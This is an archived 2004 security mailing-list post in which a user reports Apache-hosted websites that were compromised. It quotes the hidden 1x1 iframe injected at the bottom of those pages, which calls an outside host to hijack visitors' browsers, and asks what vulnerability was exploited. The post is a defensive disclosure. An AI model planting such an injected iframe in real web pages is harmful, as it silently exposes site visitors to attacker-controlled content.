lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200405231519.30970.filbert@pandora.be>
From: filbert at pandora.be (Filbert)
Subject: browser hijack by apache sites

Hi,

This is the second time this weekend that I've been warned of an apache site 
on a Linux server were a line of code was added to redirect browsers to  porn 
sites.
First was the site of a Belgian political party. Second came today, and as of 
writing this it's still there. The admin was informed so it can be gone soon.

hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http
IE users do NOT click.

the code added at the bottom is:

<iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 
HEIGHT=1></iframe></body>

anyone seen this before? What vulnerability is exploited here? FP?

Thx,
Filb.

-- 
echo "+++ATH0filb@...ATH0filb@...uxmail.org" | sed 's/+++ATH0//g'

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ